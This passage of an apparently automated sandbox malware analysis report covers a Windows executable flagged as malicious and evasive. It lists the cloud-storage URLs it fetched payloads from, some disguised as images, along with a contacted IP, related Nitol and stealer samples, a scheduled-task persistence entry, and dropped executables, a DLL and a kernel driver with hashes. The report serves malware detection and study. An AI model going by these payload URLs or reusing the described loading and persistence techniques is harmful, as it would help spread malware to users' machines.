            https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifhttps://jylhok.oss-cn-beijing.aliyuncs.com/b.gifhttp287438657364-7643738421.08.exe, 00000000.00000003.2259204008.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000525000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.symauth.com/rpa00287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drfalse
              		high
              https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifents287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://jylhok.oss-cn-beijing.aliyuncs.com/d.gifws287438657364-7643738421.08.exe, 00000000.00000003.2318798939.00000000004D0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://jylhok.oss-cn-beijing.aliyuncs.com/C287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004E0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              39.103.20.48
              		sc-2a1c.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comChina
              		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse

              General Information

              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1585091
              Start date and time:2025-01-07 04:13:13 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 6m 33s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:10
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:287438657364-7643738421.08.exe
              Detection:MAL
              Classification:mal80.evad.winEXE@4/12@1/1
              EGA Information:
              • Successful, ratio: 66.7%
              HCA Information:
              • Successful, ratio: 58%
              • Number of executed functions: 12
              • Number of non-executed functions: 190
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
              • Excluded IPs from analysis (whitelisted): 20.109.210.53
              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target O8xg2t.exe, PID 6880 because there are no executed function
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              04:15:50Task SchedulerRun new task: 8wPRd path: C:\Users\user\Documents\O8xg2t.exe
              22:14:09API Interceptor941x Sleep call for process: 287438657364-7643738421.08.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdx86_64.elfGet hashmaliciousMiraiBrowse
              • 8.171.83.51
              i486.elfGet hashmaliciousMiraiBrowse
              • 47.107.186.79
              arm4.elfGet hashmaliciousMiraiBrowse
              • 118.178.206.165
              2.elfGet hashmaliciousUnknownBrowse
              • 60.205.221.193
              1.elfGet hashmaliciousUnknownBrowse
              • 47.107.3.205
              3.elfGet hashmaliciousUnknownBrowse
              • 8.184.34.244
              2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
              • 39.103.20.26
              2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
              • 39.103.20.26
              cZO.exeGet hashmaliciousUnknownBrowse
              • 120.77.100.135
              z0r0.m68k.elfGet hashmaliciousMiraiBrowse
              • 8.133.115.153

              JA3 Fingerprints

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              37f463bf4616ecd445d4a1937da06e19u1XWB0BIju.msiGet hashmaliciousUnknownBrowse
              • 39.103.20.48
              setup.msiGet hashmaliciousUnknownBrowse
              • 39.103.20.48
              2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
              • 39.103.20.48
              2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
              • 39.103.20.48
              drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
              • 39.103.20.48
              ZT0KQ1PC.exeGet hashmaliciousPureLog Stealer, VidarBrowse
              • 39.103.20.48
              LinxOptimizer.exeGet hashmaliciousUnknownBrowse
              • 39.103.20.48
              setup.msiGet hashmaliciousUnknownBrowse
              • 39.103.20.48
              drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
              • 39.103.20.48

              Dropped Files

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\Users\user\Documents\O8xg2t.exe2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
                2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
                  2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                    2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                      45631.exeGet hashmaliciousNitolBrowse
                        45631.exeGet hashmaliciousUnknownBrowse
                          0000000000000000.exeGet hashmaliciousNitolBrowse
                            0000000000000000.exeGet hashmaliciousUnknownBrowse
                              T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\s[1].jpg

                                Download File
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                Category:dropped
                                Size (bytes):8299
                                Entropy (8bit):7.9354275320361545
                                Encrypted:false
                                SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                                MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                                SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
                                SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                                SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE...............CHI........[..>G..*C..&.!7*..E..)U&.$...z.tuv......?..............

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\c[1].gif

                                Download File
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                Category:dropped
                                Size (bytes):10681
                                Entropy (8bit):7.866148090449211
                                Encrypted:false
                                SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                                MD5:10A818386411EE834D99AE6B7B68BE71
                                SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                                SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                                SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                                Malicious:false
                                Reputation:low
                                Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\i[1].dat

                                Download File
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):512
                                Entropy (8bit):5.2008868627450004
                                Encrypted:false
                                SSDEEP:6:W7pdRda+CrCa2BIDR/yYWRudduXCCmZ7OdUzW9E40/qcX:mpUMBIDR/yYWRudduXCCmdgUzWg3
                                MD5:6FE90B6ABE6C4D1079B730F10120B3D1
                                SHA1:EEEC97FDCF98EEA2A53C033D5ECC75D5C3A0C438
                                SHA-256:9EB8597171F3CDF8892B9DEC93A4E2D63DE7D2D9B28B823FB374E111583B55F5
                                SHA-512:161CF27D69434B4049EA47B2E0AE9283B820DBF8659B3B5CDACCC7FF3CEEF1DBBB3DB7A58CD2AFE7617E3BE866C6E26CA14B30BF6464EBA4C75764715F700C2B
                                Malicious:false
                                Reputation:low
                                Preview:....l%00ZI\X73v7DD.T:y61X[X_8q>3ZJF]>.s>QS._q86999999999999999999999999999999999QMMI:sff....ae a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33YJ_[40u4GG.W9z52[X[\;r=0YIE^=-p=RP.^p97888888888888888888888888888888888PLLH;rgg....`d!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6|ylllllllllllllllllllllllllllllllllllll

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\a[1].gif

                                Download File
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                Category:dropped
                                Size (bytes):135589
                                Entropy (8bit):7.995304392539578
                                Encrypted:true
                                SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                SHA1:561836F6228E24180238DF9456707A2443C5795C
                                SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                Malicious:false
                                Reputation:low
                                Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\d[1].gif

                                Download File
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                Category:dropped
                                Size (bytes):3892010
                                Entropy (8bit):7.995495589600101
                                Encrypted:true
                                SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                                MD5:E4E46F3980A9D799B1BD7FC408F488A3
                                SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                                SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                                SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                                Malicious:false
                                Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\b[1].gif

                                Download File
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                Category:dropped
                                Size (bytes):125333
                                Entropy (8bit):7.993522712936246
                                Encrypted:true
                                SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                MD5:2CA9F4AB0970AA58989D66D9458F8701
                                SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                Malicious:false
                                Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\s[1].dat

                                Download File
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):28272
                                Entropy (8bit):7.711627336404117
                                Encrypted:false
                                SSDEEP:384:9eegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQ8:B5F1FUdy422IK+gAZt2i0YPpQn4GMr
                                MD5:B49BF11DC361D426B398BB8C06DCFBFC
                                SHA1:815737B9770BF4404AE201BA9AD4ECA7E286F0BF
                                SHA-256:F3C2B3590B51FFB26D50E95C3B6D7DAC81F09AFE96E209723D920C0B4BEF07AA
                                SHA-512:DA049725398577C8F3D7224D61462614EA56E5A8350A1B86E5085BD8BA575F8FA7FCFC55BA4B7234360D9838579AAB5B14366896F27AA5A6446AD91A8C66DF09
                                Malicious:false
                                Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb$bcbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

                                C:\Users\user\Documents\MsMpList.dat

                                Download File
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):3889557
                                Entropy (8bit):7.999938753862441
                                Encrypted:true
                                SSDEEP:98304:LAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:EndLOZS/DtpPJRO8OHBL4f2UQI+A
                                MD5:97057F6C160572D66FD8942F28133297
                                SHA1:42CB5891A893AAF769E7E963816BE7B74766DEEE
                                SHA-256:FA9EE3D12826110846C95845141CFF32154A3EB924DD5BB3A1BE9931C40FEC1B
                                SHA-512:70E23839A31E213DE2231E37DDDBB76B01A02B1256E9E195159C0ED261995B8620DE0110241A85C2D79FB65DF17382D720D04BF9002E52A3EC91A791999BB08F
                                Malicious:false
                                Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                C:\Users\user\Documents\O8xg2t.exe

                                Download File
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):133136
                                Entropy (8bit):6.350273548571922
                                Encrypted:false
                                SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse
                                • Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse
                                • Filename: 2b687482300.6345827638.08.exe, Detection: malicious, Browse
                                • Filename: 2b687482300.6345827638.08.exe, Detection: malicious, Browse
                                • Filename: 45631.exe, Detection: malicious, Browse
                                • Filename: 45631.exe, Detection: malicious, Browse
                                • Filename: 0000000000000000.exe, Detection: malicious, Browse
                                • Filename: 0000000000000000.exe, Detection: malicious, Browse
                                • Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\Documents\WordpadFilter.db

                                Download File
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:GIF image data, version 89a, 10 x 10
                                Category:dropped
                                Size (bytes):8228
                                Entropy (8bit):7.978965865518848
                                Encrypted:false
                                SSDEEP:192:7Bue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:7BuNhyTlBU2dp+1XrBuCgp9vU0l
                                MD5:A315A7E9EE892679B0F8FAB9C1F38D4C
                                SHA1:021BAED46FA2C4AFE75027DC6884D66DFE582AED
                                SHA-256:1974F6C8502515270933350BB921EF7574C04641147F464AD1ADA2FB10691102
                                SHA-512:3BB103FB061DD1E76B86B8C68C569A2096BE4C46F748E7787B8AC1D6E3E9A5B38BA637655290F09E09543AED2B4AF3CEC347BA0D5AB9AA21295D5341CEE95C0B
                                Malicious:false
                                Preview:GIF89a.......,.N.........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI

                                C:\Users\user\Documents\vselog.dll

                                Download File
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):122880
                                Entropy (8bit):6.002074252556158
                                Encrypted:false
                                SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52Fr:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gr
                                MD5:BE8593187A8085D0BA96BA73CDBACBDA
                                SHA1:D2554B24CEAC749D4FC4C56D6C773E69EB541C56
                                SHA-256:33AEBA6CFD297402B050BFD0D3315F2F063B546E2B3413F5A2CC38991AC06140
                                SHA-512:3821D6B1B1B78B40A4D40715F04595BF7F46692E046DF1494CEC227FEB9694AAFAC08484CDC3384B70D6507C0790A24AE42645EDB9AAD83B32A3D4942DFE3660
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................

                                C:\Windows\System32\drivers\189atohci.sys

                                Download File
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):28272
                                Entropy (8bit):6.228740525083608
                                Encrypted:false
                                SSDEEP:384:83YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/P:8OUkgfdZ9pRyv+uPzCMHo3q4tDghN
                                MD5:EFD0D6EAAF4AC868C9FB7F6B5F51FB20
                                SHA1:788666FB17622D4EE08C6AAAD4B382915BF4394D
                                SHA-256:16AACF76E10998C870F1F7FF2A7B03C29666B949E6B4F021178347364832E49E
                                SHA-512:ECEADFAD1D8AD3347FFFBA46B59A883DE6999C074F84A4D8BC65A566D10DD0F7158A05E916E383C62D725B76F9C904941EF0F143C5F167CAC9D326DFB2D8E718
                                Malicious:true
